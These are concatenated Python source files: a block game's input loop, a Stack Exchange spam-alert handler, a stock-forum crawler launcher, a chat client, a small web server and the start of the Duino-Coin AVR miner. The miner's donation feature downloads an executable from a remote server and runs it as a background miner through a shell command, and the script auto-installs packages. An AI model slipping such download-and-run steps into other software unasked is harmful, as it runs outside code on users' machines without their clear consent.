self.next_move = Direction.Left
elif event.keysym == 'space':
self.next_move = Direction.Drop
elif event.keysym == 'z':
self.next_move = Rotation.Clockwise
elif event.keysym == 'x':
self.next_move = Rotation.Anticlockwise
elif event.keysym == 'b':
self.next_move = Action.Bomb
elif event.keysym == 'd':
self.next_move = Action.Discard
else:
return
self.has_move.notify()
def drop(self):
with self.has_move:
self.next_move = None
self.has_move.notify()
self.target.after(INTERVAL, self.drop)
def choose_action(self, board):
with self.has_move:
self.has_move.wait()
try:
return self.next_move
finally:
self.next_move = None
def run():
root = Tk()
# Try making window a dialog if the system allows it.
try:
root.attributes('-type', 'dialog')
except TclError:
pass
args = parser.parse_args()
if args.manual:
player = UserPlayer(root)
else:
player = SelectedPlayer()
adversary = RandomAdversary(DEFAULT_SEED, BLOCK_LIMIT)
board = Board(BOARD_WIDTH, BOARD_HEIGHT)
def runner():
try:
for move in board.run(player, adversary):
# When not playing manually, allow some time to see the move.
if not args.manual:
sleep(0.05)
except BlockLimitException:
print("Out of blocks")
print("Score=", board.score)
print("Press ESC in game window to exit")
Visual(board)
background = Thread(target=runner)
background.daemon = True
background.start()
root.mainloop()
raise SystemExit
if __name__ == '__main__':
run()
|
spamhandling.py
|
import sys
from threading import Thread
from findspam import FindSpam
from datahandling import *
from parsing import get_user_from_url, unescape_title,\
escape_special_chars_in_title, to_protocol_relative
from globalvars import GlobalVars
from datetime import datetime
from parsing import url_to_shortlink, user_url_to_shortlink
from metasmoke import Metasmoke
from deletionwatcher import DeletionWatcher
import excepthook
def should_whitelist_prevent_alert(user_url, reasons):
is_whitelisted = is_whitelisted_user(get_user_from_url(user_url))
if not is_whitelisted:
return False
reasons_comparison = [r for r in set(reasons) if "username" not in r]
return len(reasons_comparison) == 0
def check_if_spam(title, body, user_name, user_url, post_site, post_id, is_answer, body_is_summary, owner_rep, post_score):
if not body:
body = ""
test, why = FindSpam.test_post(title, body, user_name, post_site, is_answer, body_is_summary, owner_rep, post_score)
if is_blacklisted_user(get_user_from_url(user_url)):
test.append("blacklisted user")
blacklisted_user_data = get_blacklisted_user_data(get_user_from_url(user_url))
if len(blacklisted_user_data) > 1:
message_url = 'http:' + blacklisted_user_data[1]
blacklisted_post_url = blacklisted_user_data[2]
if blacklisted_post_url:
rel_url = blacklisted_post_url.replace("http:", "", 1)
why += u"\nBlacklisted user - blacklisted for {} (http://metasmoke.erwaysoftware.com/posts/by-url?url={}) by {}".format(blacklisted_post_url, rel_url, message_url)
else:
why += u"\n" + u"Blacklisted user - blacklisted by {}".format(message_url)
if 0 < len(test):
if has_already_been_posted(post_site, post_id, title) or is_false_positive((post_id, post_site)) \
or should_whitelist_prevent_alert(user_url, test) \
or is_ignored_post((post_id, post_site)) \
or is_auto_ignored_post((post_id, post_site)):
return False, None, "" # Don't repost. Reddit will hate you.
return True, test, why
return False, None, ""
def check_if_spam_json(json_data):
text_data = json.loads(json_data)["data"]
if text_data == "hb":
return False, None, ""
try:
data = json.loads(text_data)
except ValueError:
GlobalVars.charcoal_hq.send_message(u"Encountered ValueError parsing the following:\n{0}".format(json_data), False)
return False, None, ""
if "ownerUrl" not in data:
# owner's account doesn't exist anymore, no need to post it in chat:
# http://chat.stackexchange.com/transcript/message/18380776#18380776
return False, None, ""
title = data["titleEncodedFancy"]
title = unescape_title(title)
body = data["bodySummary"]
poster = data["ownerDisplayName"]
url = data["url"]
post_id = str(data["id"])
print time.strftime("%Y-%m-%d %H:%M:%S"), title.encode("ascii", errors="replace")
site = data["siteBaseHostAddress"]
site = site.encode("ascii", errors="replace")
sys.stdout.flush()
is_spam, reason, why = check_if_spam(title, body, poster, url, site, post_id, False, True, 1, 0)
return is_spam, reason, why
def handle_spam(title, body, poster, site, post_url, poster_url, post_id, reasons, is_answer, why="", owner_rep=None, post_score=None, up_vote_count=None, down_vote_count=None, question_id=None):
post_url = to_protocol_relative(url_to_shortlink(post_url))
poster_url = to_protocol_relative(user_url_to_shortlink(poster_url))
reason = ", ".join(reasons)
reason = reason[:1].upper() + reason[1:] # reason is capitalised, unlike the entries of reasons list
append_to_latest_questions(site, post_id, title if not is_answer else "")
if len(reasons) == 1 and ("all-caps title" in reasons or
"repeating characters in title" in reasons or
"repeating characters in body" in reasons or
"repeating characters in answer" in reasons or
"repeating words in title" in reasons or
"repeating words in body" in reasons or
"repeating words in answer" in reasons):
add_auto_ignored_post((post_id, site, datetime.now()))
if why is not None and why != "":
add_why(site, post_id, why)
if is_answer and question_id is not None:
add_post_site_id_link((post_id, site, "answer"), question_id)
try:
title = escape_special_chars_in_title(title)
if not poster.strip():
s = u"[ [SmokeDetector](//git.io/vgx7b) ] {}: [{}]({}) by a deleted user on `{}`" \
.format(reason, title.strip(), post_url, site)
username = ""
user_link = ""
else:
s = u"[ [SmokeDetector](//git.io/vgx7b) ] {}: [{}]({}) by [{}]({}) on `{}`" \
.format(reason, title.strip(), post_url, poster.strip(), poster_url, site)
username = poster.strip()
user_link = poster_url
t_metasmoke = Thread(target=Metasmoke.send_stats_on_post,
args=(title, post_url, reason.split(", "), body, username, user_link, why, owner_rep, post_score, up_vote_count, down_vote_count))
t_metasmoke.start()
print GlobalVars.parser.unescape(s).encode('ascii', errors='replace')
if time.time() >= GlobalVars.blockedTime["all"]:
append_to_latest_questions(site, post_id, title)
if reason not in GlobalVars.experimental_reasons:
metasmoke_link = u" [\u2026](//metasmoke.erwaysoftware.com/posts/by-url?url=" + post_url + ")"
if time.time() >= GlobalVars.blockedTime[GlobalVars.charcoal_room_id]:
chq_pings = get_user_names_on_notification_list("stackexchange.com", GlobalVars.charcoal_room_id, site, GlobalVars.wrap)
chq_msg = append_pings(s, chq_pings)
chq_msg_ms = chq_msg + metasmoke_link
GlobalVars.charcoal_hq.send_message(chq_msg_ms if len(chq_msg_ms) <= 500 else chq_msg if len(chq_msg) <= 500 else s[0:500])
if reason not in GlobalVars.non_tavern_reasons and site not in GlobalVars.non_tavern_sites and time.time() >= GlobalVars.blockedTime[GlobalVars.meta_tavern_room_id]:
tavern_pings = get_user_names_on_notification_list("meta.stackexchange.com", GlobalVars.meta_tavern_room_id, site, GlobalVars.wrapm)
tavern_msg = append_pings(s, tavern_pings)
tavern_msg_ms = tavern_msg + metasmoke_link
msg_to_send = tavern_msg_ms if len(tavern_msg_ms) <= 500 else tavern_msg if len(tavern_msg) <= 500 else s[0:500]
t_check_websocket = Thread(target=DeletionWatcher.post_message_if_not_deleted, args=((post_id, site, "answer" if is_answer else "question"), post_url, msg_to_send, GlobalVars.tavern_on_the_meta))
t_check_websocket.daemon = True
t_check_websocket.start()
if site == "stackoverflow.com" and reason not in GlobalVars.non_socvr_reasons and time.time() >= GlobalVars.blockedTime[GlobalVars.socvr_room_id]:
socvr_pings = get_user_names_on_notification_list("stackoverflow.com", GlobalVars.socvr_room_id, site, GlobalVars.wrapso)
socvr_msg = append_pings(s, socvr_pings)
socvr_msg_ms = socvr_msg + metasmoke_link
GlobalVars.socvr.send_message(socvr_msg_ms if len(socvr_msg_ms) <= 500 else socvr_msg if len(socvr_msg) <= 500 else s[0:500])
for specialroom in GlobalVars.specialrooms:
sites = specialroom["sites"]
if site in sites and reason not in specialroom["unwantedReasons"]:
room = specialroom["room"]
if room.id not in GlobalVars.blockedTime or time.time() >= GlobalVars.blockedTime[room.id]:
room_site = room._client.host
room_id = int(room.id)
room_pings = get_user_names_on_notification_list(room_site, room_id, site, room._client)
room_msg = append_pings(s, room_pings)
room_msg_ms = room_msg + metasmoke_link
specialroom["room"].send_message(room_msg_ms if len(room_msg_ms) <= 500 else room_msg if len(room_msg) <= 500 else s[0:500])
except:
exc_type, exc_obj, exc_tb = sys.exc_info()
excepthook.uncaught_exception(exc_type, exc_obj, exc_tb)
def handle_user_with_all_spam(user, why):
user_id = user[0]
site = user[1]
tab = "activity" if site == "stackexchange.com" else "topactivity"
s = "[ [SmokeDetector](//git.io/vgx7b) ] All of this user's posts are spam: [user {} on {}](//{}/users/{}?tab={})" \
.format(user_id, site, site, user_id, tab)
print GlobalVars.parser.unescape(s).encode('ascii', errors='replace')
add_why_allspam(user, why)
if time.time() >= GlobalVars.blockedTime[GlobalVars.meta_tavern_room_id]:
GlobalVars.tavern_on_the_meta.send_message(s)
if time.time() >= GlobalVars.blockedTime[GlobalVars.charcoal_room_id]:
GlobalVars.charcoal_hq.send_message(s)
if site == "stackoverflow.com" and time.time() >= GlobalVars.blockedTime[GlobalVars.socvr_room_id]:
GlobalVars.socvr.send_message(s)
for specialroom in GlobalVars.specialrooms:
room = specialroom["room"]
if site in specialroom["sites"] and (room.id not in GlobalVars.blockedTime or time.time() >= GlobalVars.blockedTime[room.id]):
room.send_message(s)
|
audioTNC.py
|
'''
Created on Sep 26, 2016
@author: matth
'''
#plan
# auto find com port (atelast ask for port number)
# verify that port is good
# background thread the serial read
'''
import serial
import threading
from threading import Thread
from queue import Queue
import AFSK.afsk as afsk
class AudioTNC():
def __init__(self,portname,baud):
self.qin=Queue()
self.qout=Queue()
self.AudioReader=AudioThread(self.qin,self.qout,portname,baud)
self.threader = Thread(target=self.AudioReader.thread, args=())
def _handle_signal(self,signal, frame):
# mark the loop stopped
# cleanup
self.cleanup()
def cleanup(self):
print("cleaning up ...")
self.threading.ser.close()
def startAudioDat(self):
self.threader.start()
def stopAudioDat(self):
self.qin.put(False)
def transmitAudioDat(self,line):
self.qin.put(line.encode())
def getAudioDat(self):
if(self.qout.empty()==False):
return self.qout.get()
'''
#This is the thread that is created to handle the continous loop for the serial data.
'''
class AudioThread(threading.Thread):
#serialListen(ser,x)
def __init__(self,qin,qout,portname,baud):
self.qin=qin
self.qout=qout
self.portname=portname
self.baud=baud
self.running=True
self.lines=""
self.newLine=False
def stopListening(self):
self.running=False
def thread(self):#this will need to be rewritten
x=0
print(self.portname)
print(self.baud)
audio = afsk.
self.serrunning=True
while self.running:
if self.qin.empty()==False:
self.line=self.qin.get()
if self.line==False:
self.running=False
break
ser.write(self.line)
if ser.in_waiting!=0:
x = ser.readline()
self.qout.empty()
self.qout.put(x)
print(x)
ser.close()
'''
|
runCrawler.py
|
# !/usr/bin/python3.6
# -*- coding: UTF-8 -*-
# @author: guichuan
from scrapy.utils.project import get_project_settings
import sys
path = r'/home/alex/桌面/Python/Project/Spider_Project/GubaCrawler'
sys.path.append(path)
from GubaCrawler.spiders.createEastMoneySpider import EastMoneySpider
from scrapy.crawler import CrawlerProcess
import os
import pandas as pd
import numpy as np
from multiprocessing import Process
stock_list_file_name = 'GubaCrawler/stock_lists/ZZ500.csv'
def get_stock_list():
spider_path = os.path.abspath(os.curdir)
df = pd.read_csv(os.path.join(spider_path, stock_list_file_name),
dtype={0: str, 1: str}, header=0)
stock_dictionary = dict(zip(df['ticker'].tolist(), df['display_name'].tolist()))
return stock_dictionary
def make_batches(size, batch_size):
nb_batch = int(np.ceil(size / float(batch_size)))
return [(i * batch_size, min(size, (i + 1) * batch_size)) for i in range(0, nb_batch)]
def spider_run(stock_list):
settings = get_project_settings()
process = CrawlerProcess(settings)
process.crawl(EastMoneySpider, stock_list=stock_list)
process.start()
if __name__ == "__main__":
stock_list = list(get_stock_list().keys())[200:250]
query_list = make_batches(50, 25)
for start, end in query_list:
stock_list_query = stock_list[start:end]
p = Process(target=spider_run, args=(stock_list_query,))
p.start()
|
client.py
|
import socket
import sys
import time
from tkinter import *
from threading import Thread
def showMultilineMsg(message_div, message_to_display): # displays multiline messages one line at a time as tkinter does not understand the line break \n symbol
message_div.insert(END, ' ')
for item in message_to_display.split('\n'):
message_div.insert(END, item)
time.sleep(0.1)
message_div.insert(END, ' ')
def sendMsg(user_msg, chat_window):
msg_got = user_msg.get()
if str(msg_got) == '/quit':
client_socket.close()
chat_window.quit()
else:
user_msg.set('')
try:
client_socket.sendall(str(msg_got).encode())
except:
closeWindow(user_msg, chat_window)
def receiveMsg(messages):
while True:
try:
recieved_msg = client_socket.recv(1024).decode()
if '<<Available commands>>' in recieved_msg or '<<Users>>' in recieved_msg:
showMultilineMsg(messages, recieved_msg)
else:
messages.insert(END, recieved_msg)
except OSError as e:
error_code = e.args[0]
if error_code == 10053:
print('Connection close')
elif error_code == 10054:
messages.insert(END, 'Server has shut down - please close window or press <Send> to exit')
break
def closeWindow(user_msg, chat_window):
user_msg.set('/quit')
sendMsg(user_msg, chat_window)
def startClient():
username = ''
host = ''
port = ''
if len(sys.argv) != 4:
print('Insufficient connection information given, please try again!')
while not username and not host and not port:
username = str(input('Username: '))
host = str(input('Host: '))
port = str(input('Port: '))
else:
username = sys.argv[1]
host = sys.argv[2]
port = sys.argv[3]
### Initialise chat window ###
chat_window = Tk()
chat_window.title('Chatroom')
frame = Frame(chat_window)
user_msg = StringVar()
user_msg.set('Enter message here')
scrollbar = Scrollbar(frame)
messages = Listbox(frame, height = 15, width = 100, yscrollcommand = scrollbar.set)
scrollbar.pack(side = RIGHT, fill = Y)
messages.pack(side = LEFT, fill = BOTH)
messages.pack()
frame.pack()
input_field = Entry(chat_window, text = user_msg)
input_field.bind("<Return>", lambda event : sendMsg(user_msg, chat_window)) # allows users to press "Enter" to send message
input_field.pack()
send_button = Button(chat_window, text = 'SEND', command = lambda : sendMsg(user_msg, chat_window)) # create button to invoke function to send message
send_button.pack()
chat_window.protocol('WM_DELETE_WINDOW', lambda : closeWindow(user_msg, chat_window)) # gets invoked when user closes chat window
##############################
try:
client_socket.connect((host, int(port)))
client_socket.sendall(username.encode())
except Exception as e:
print('Server not found due to error: ' + str(e))
messages.insert(END, 'Connection with server cannot be made. Hit <SEND> to close window.')
closeWindow(user_msg, chat_window)
try:
rcv_thread = Thread(target=receiveMsg, args=(messages, ))
rcv_thread.start()
chat_window.mainloop()
except KeyboardInterrupt:
print('KeyboardInterrupt - Force closing chat window')
client_socket.close()
chat_window.quit()
sys.exit(1)
if __name__ == '__main__':
client_socket = socket.socket()
startClient()
|
web_server.py
|
import functools
import logging
import random
import socketserver
import time
from multiprocessing.context import Process
from tradingkit.utils.request_handler import RequestHandler
class WebServer:
@staticmethod
def serve(routing: dict, open_browser=False, timeout=None, filename=''):
p = Process(target=WebServer.serve_and_browse, args=(routing, open_browser, filename, ))
p.start()
wait_for_server_seconds = timeout
logging.info("Waiting for server %d seconds" % wait_for_server_seconds)
time.sleep(wait_for_server_seconds)
p.terminate()
@staticmethod
def serve_and_browse(routing: dict, open_browser=False, filename=''):
handler = functools.partial(RequestHandler, routing)
port = random.randint(1024, 65535)
with socketserver.TCPServer(("", port), handler) as httpd:
if open_browser:
import webbrowser
webbrowser.open_new_tab('http://localhost:%d%s' % (port, filename))
print("serving at port", port)
httpd.serve_forever()
|
AVR_Miner.py
|
#!/usr/bin/env python3
"""
Duino-Coin Official AVR Miner 2.74 © MIT licensed
https://duinocoin.com
https://github.com/revoxhere/duino-coin
Duino-Coin Team & Community 2019-2021
"""
from os import _exit, execl, mkdir
from os import name as osname
from os import path
from os import system as ossystem
from platform import machine as osprocessor
from platform import system
import sys
from configparser import ConfigParser
from pathlib import Path
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from re import sub
from socket import socket
from datetime import datetime
from statistics import mean
from signal import SIGINT, signal
from time import ctime, sleep, strptime, time
from random import choice
import select
import pip
from subprocess import DEVNULL, Popen, check_call, call
from threading import Thread
from threading import Lock as thread_lock
from threading import Semaphore
printlock = Semaphore(value=1)
def install(package):
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
call([sys.executable, __file__])
try:
from serial import Serial
import serial.tools.list_ports
except ModuleNotFoundError:
print("Pyserial is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pyserial")
install('pyserial')
try:
import requests
except ModuleNotFoundError:
print("Requests is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install requests")
install('requests')
try:
from colorama import Back, Fore, Style, init
init(autoreset=True)
except ModuleNotFoundError:
print("Colorama is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install colorama")
install("colorama")
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pypresence")
install("pypresence")
def now():
return datetime.now()
def port_num(com):
return str(''.join(filter(str.isdigit, com)))
class Settings:
VER = '2.74'
SOC_TIMEOUT = 45
REPORT_TIME = 60
AVR_TIMEOUT = 4 # diff 6 * 100 / 196 h/s = 3.06
BAUDRATE = 115200
DATA_DIR = "Duino-Coin AVR Miner " + str(VER)
SEPARATOR = ","
ENCODING = "utf-8"
BLOCK = " ‖ "
PICK = ""
COG = " @"
if osname != "nt":
# Windows' cmd does not support emojis, shame!
PICK = " ⛏"
COG = " ⚙"
class Client:
"""
Class helping to organize socket connections
"""
def connect(pool: tuple):
s = socket()
s.settimeout(Settings.SOC_TIMEOUT)
s.connect((pool))
return s
def send(s, msg: str):
sent = s.sendall(str(msg).encode(Settings.ENCODING))
return True
def recv(s, limit: int = 128):
data = s.recv(limit).decode(Settings.ENCODING).rstrip("\n")
return data
def fetch_pool():
while True:
pretty_print("net0", " " + get_string("connection_search"),
"warning")
try:
response = requests.get(
"https://server.duinocoin.com/getPool").json()
if response["success"] == True:
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
debug_output(f"Fetched pool: {response['name']}")
return (NODE_ADDRESS, NODE_PORT)
elif "message" in response:
pretty_print(f"Warning: {response['message']}"
+ ", retrying in 15s", "warning", "net0")
sleep(15)
else:
raise Exception(
"no response - IP ban or connection error")
except Exception as e:
pretty_print("net0",
f"Error fetching mining node: {e}"
+ ", retrying in 15s", "error")
sleep(15)
class Donate:
def load(donation_level):
if donation_level > 0:
if osname == 'nt':
if not Path(
f"{Settings.DATA_DIR}/Donate.exe").is_file():
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableWindows.exe')
r = requests.get(url)
with open(f"{Settings.DATA_DIR}/Donate.exe",
'wb') as f:
f.write(r.content)
elif osname == "posix":
if osprocessor() == "aarch64":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH64')
elif osprocessor() == "armv7l":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH32')
else:
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableLinux')
if not Path(
f"{Settings.DATA_DIR}/Donate").is_file():
r = requests.get(url)
with open(f"{Settings.DATA_DIR}/Donate",
"wb") as f:
f.write(r.content)
def start(donation_level):
if osname == 'nt':
cmd = (f'cd "{Settings.DATA_DIR}" & Donate.exe '
+ '-o stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*5}')
elif osname == 'posix':
cmd = (f'cd "{Settings.DATA_DIR}" && chmod +x Donate '
+ '&& nice -20 ./Donate -o '
+ 'stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*5}')
if donation_level <= 0:
pretty_print(
'sys0', Fore.YELLOW
+ get_string('free_network_warning').lstrip()
+ get_string('donate_warning').replace("\n", "\n\t\t")
+ Fore.GREEN + 'https://duinocoin.com/donate'
+ Fore.YELLOW + get_string('learn_more_donate'),
'warning')
sleep(5)
if donation_level > 0:
debug_output(get_string('starting_donation'))
donateExecutable = Popen(cmd, shell=True, stderr=DEVNULL)
pretty_print('sys0',
get_string('thanks_donation').replace("\n", "\n\t\t"),
'warning')
shares = [0, 0]
hashrate_mean = []
ping_mean = []
diff = 0
shuffle_ports = "y"
donator_running = False
job = ''
debug = 'n'
discord_presence = 'y'
rig_identifier = 'None'
donation_level = 0
hashrate = 0
config = ConfigParser()
mining_start_time = time()
if not path.exists(Settings.DATA_DIR):
mkdir(Settings.DATA_DIR)
if not Path(Settings.DATA_DIR + '/Translations.json').is_file():
url = ('https://raw.githubusercontent.com/'
+ 'revoxhere/'
+ 'duino-coin/master/Resources/'
+ 'AVR_Miner_langs.json')
r = requests.get(url)
with open(Settings.DATA_DIR + '/Translations.json', 'wb') as f:
f.write(r.content)
# Load language file
with open(Settings.DATA_DIR + '/Translations.json', 'r',
encoding='utf8') as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if system() == 'Darwin':
if getlocale()[0] is None:
setlocale(LC_ALL, 'en_US.UTF-8')
try:
if not Path(Settings.DATA_DIR + '/Settings.cfg').is_file():
locale = getdefaultlocale()[0]
if locale.startswith('es'):
lang = 'spanish'
elif locale.startswith('sk'):
lang = 'slovak'
elif locale.startswith('ru'):
lang = 'russian'
elif locale.startswith('pl'):
lang = 'polish'
elif locale.startswith('de'):
lang = 'german'
elif locale.startswith('fr'):
lang = 'french'
elif locale.startswith('tr'):
lang = 'turkish'
elif locale.startswith('it'):
lang = 'italian'
elif locale.startswith('pt'):
lang = 'portuguese'
elif locale.startswith('zh'):
lang = 'chinese_simplified'
elif locale.startswith('th'):
lang = 'thai'
elif locale.startswith('az'):
lang = 'azerbaijani'
elif locale.startswith('nl'):
lang = 'dutch'
else:
lang = 'english'
else:
try:
config.read(Settings.DATA_DIR + '/Settings.cfg')
lang = config["AVR Miner"]['language']
except Exception:
lang = 'english'
except:
lang = 'english'
def get_string(string_name: str):
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file['english']:
return lang_file['english'][string_name]
else:
return ' String not found: ' + string_name
def get_prefix(symbol: str,
val: float,
accuracy: int):
"""
H/s, 1000 => 1 kH/s
"""
if val >= 1_000_000_000_000: # Really?
val = str(round((val / 1_000_000_000_000), accuracy)) + " T"
elif val >= 1_000_000_000:
val = str(round((val / 1_000_000_000), accuracy)) + " G"
elif val >= 1_000_000:
val = str(round((val / 1_000_000), accuracy)) + " M"
elif val >= 1_000:
val = str(round((val / 1_000))) + " k"
else:
if symbol:
val = str(round(val)) + " "
else:
val = str(round(val))
return val + symbol
def debug_output(text: str):
if debug == 'y':
print(Style.RESET_ALL + Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S.%f ')
+ Style.NORMAL + f'DEBUG: {text}')
def title(title: str):
if osname == 'nt':
"""
Changing the title in Windows' cmd
is easy - just use the built-in
title command
"""
ossystem('title ' + title)
else:
"""
Most *nix terminals use
this escape sequence to change
the console window title
"""
print('\33]0;' + title + '\a', end='')
sys.stdout.flush()
def handler(signal_received, frame):
pretty_print(
'sys0', get_string('sigint_detected')
+ Style.NORMAL + Fore.RESET
+ get_string('goodbye'), 'warning')
_exit(0)
# Enable signal handler
signal(SIGINT, handler)
def load_config():
global username
global donation_level
global avrport
global hashrate_list
global debug
global rig_identifier
global discord_presence
global shuffle_ports
global SOC_TIMEOUT
if not Path(str(Settings.DATA_DIR) + '/Settings.cfg').is_file():
print(
Style.BRIGHT + get_string('basic_config_tool')
+ Settings.DATA_DIR
+ get_string('edit_config_file_warning'))
print(
Style.RESET_ALL + get_string('dont_have_account')
+ Fore.YELLOW + get_string('wallet') + Fore.RESET
+ get_string('register_warning'))
username = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_username')
+ Fore.RESET + Style.BRIGHT)
print(Style.RESET_ALL + Fore.YELLOW
+ get_string('ports_message'))
portlist = serial.tools.list_ports.comports(include_links=True)
for port in portlist:
print(Style.RESET_ALL
+ Style.BRIGHT + Fore.RESET
+ ' ' + str(port))
print(Style.RESET_ALL + Fore.YELLOW
+ get_string('ports_notice'))
port_names = []
for port in portlist:
port_names.append(port.device)
avrport = ''
while True:
current_port = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_avrport')
+ Fore.RESET + Style.BRIGHT)
if current_port in port_names:
avrport += current_port
confirmation = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_anotherport')
+ Fore.RESET + Style.BRIGHT)
if confirmation == 'y' or confirmation == 'Y':
avrport += ','
else:
break
else:
print(Style.RESET_ALL + Fore.RED
+ 'Please enter a valid COM port from the list above')
rig_identifier = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_rig_identifier')
+ Fore.RESET + Style.BRIGHT)
if rig_identifier == 'y' or rig_identifier == 'Y':
rig_identifier = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_rig_name')
+ Fore.RESET + Style.BRIGHT)
else:
rig_identifier = 'None'
donation_level = '0'
if osname == 'nt' or osname == 'posix':
donation_level = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_donation_level')
+ Fore.RESET + Style.BRIGHT)
donation_level = sub(r'\D', '', donation_level)
if donation_level == '':
donation_level = 1
if float(donation_level) > int(5):
donation_level = 5
if float(donation_level) < int(0):
donation_level = 0
donation_level = int(donation_level)
config["AVR Miner"] = {
'username': username,
'avrport': avrport,
'donate': donation_level,
'language': lang,
'identifier': rig_identifier,
'debug': 'n',
"soc_timeout": 45,
"avr_timeout": 4,
"discord_presence": "y",
"periodic_report": 60,
"shuffle_ports": "y"}
with open(str(Settings.DATA_DIR)
+ '/Settings.cfg', 'w') as configfile:
config.write(configfile)
avrport = avrport.split(',')
print(Style.RESET_ALL + get_string('config_saved'))
hashrate_list = [0] * len(avrport)
else:
config.read(str(Settings.DATA_DIR) + '/Settings.cfg')
username = config["AVR Miner"]['username']
avrport = config["AVR Miner"]['avrport']
avrport = avrport.replace(" ", "").split(',')
donation_level = int(config["AVR Miner"]['donate'])
debug = config["AVR Miner"]['debug']
rig_identifier = config["AVR Miner"]['identifier']
Settings.SOC_TIMEOUT = int(config["AVR Miner"]["soc_timeout"])
Settings.AVR_TIMEOUT = float(config["AVR Miner"]["avr_timeout"])
discord_presence = config["AVR Miner"]["discord_presence"]
shuffle_ports = config["AVR Miner"]["shuffle_ports"]
Settings.REPORT_TIME = int(config["AVR Miner"]["periodic_report"])
hashrate_list = [0] * len(avrport)
def greeting():
global greeting
print(Style.RESET_ALL)
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = get_string('greeting_morning')
elif current_hour == 12:
greeting = get_string('greeting_noon')
elif current_hour > 12 and current_hour < 18:
greeting = get_string('greeting_afternoon')
elif current_hour >= 18:
greeting = get_string('greeting_evening')
else:
greeting = get_string('greeting_back')
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Fore.YELLOW
+ Style.BRIGHT + get_string('banner')
+ Style.RESET_ALL + Fore.MAGENTA
+ f' {Settings.VER}' + Fore.RESET
+ ' 2019-2021')
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL + Fore.MAGENTA
+ 'https://github.com/revoxhere/duino-coin')
if lang != "english":
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + lang.capitalize()
+ " translation: " + Fore.MAGENTA
+ get_string("translation_autor"))
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('avr_on_port')
+ Style.BRIGHT + Fore.YELLOW
+ ' '.join(avrport))
if osname == 'nt' or osname == 'posix':
print(
Style.DIM + Fore.MAGENTA + Settings.BLOCK
+ Style.NORMAL + Fore.RESET
+ get_string('donation_level') + Style.BRIGHT
+ Fore.YELLOW + str(donation_level))
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('algorithm')
+ Style.BRIGHT + Fore.YELLOW
+ 'DUCO-S1A ⚙ AVR diff')
if rig_identifier != "None":
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('rig_identifier')
+ Style.BRIGHT + Fore.YELLOW + rig_identifier)
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + str(greeting) + ', '
+ Style.BRIGHT + Fore.YELLOW
+ str(username) + '!\n')
def init_rich_presence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(905158274490441808)
RPC.connect()
Thread(target=update_rich_presence).start()
except Exception as e:
#print("Error launching Discord RPC thread: " + str(e))
pass
def update_rich_presence():
startTime = int(time())
while True:
try:
total_hashrate = get_prefix("H/s", sum(hashrate_list), 2)
RPC.update(details="Hashrate: " + str(total_hashrate),
start=mining_start_time,
state=str(shares[0]) + "/"
+ str(shares[0] + shares[1])
+ " accepted shares",
large_image="avrminer",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything"
+ ", including AVR boards",
buttons=[{"label": "Visit duinocoin.com",
"url": "https://duinocoin.com"},
{"label": "Join the Discord",
"url": "https://discord.gg/k48Ht5y"}])
except Exception as e:
#print("Error updating Discord RPC thread: " + str(e))
pass
sleep(15)
def pretty_print(sender: str = "sys0",
msg: str = None,
state: str = "success"):
"""
Produces nicely formatted CLI output for messages:
HH:MM:S |sender| msg
"""
if sender.startswith("net"):
bg_color = Back.BLUE
elif sender.startswith("avr"):
bg_color = Back.MAGENTA
elif sender.startswith("sys"):
bg_color = Back.GREEN
if state == "success":
fg_color = Fore.GREEN
elif state == "error":
fg_color = Fore.RED
else:
fg_color = Fore.YELLOW
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ bg_color + Style.BRIGHT + " " + sender + " "
+ Back.RESET + " " + fg_color + msg.strip())
def share_print(id, type, accept, reject, total_hashrate,
computetime, diff, ping):
"""
Produces nicely formatted CLI output for shares:
HH:MM:S |avrN| ⛏ Accepted 0/0 (100%) ∙ 0.0s ∙ 0 kH/s ⚙ diff 0 k ∙ ping 0ms
"""
try:
diff = get_prefix("", int(diff), 0)
except:
diff = "?"
try:
total_hashrate = get_prefix("H/s", total_hashrate, 2)
except:
total_hashrate = "? H/s"
if type == "accept":
share_str = get_string("accepted")
fg_color = Fore.GREEN
elif type == "block":
share_str = get_string("block_found")
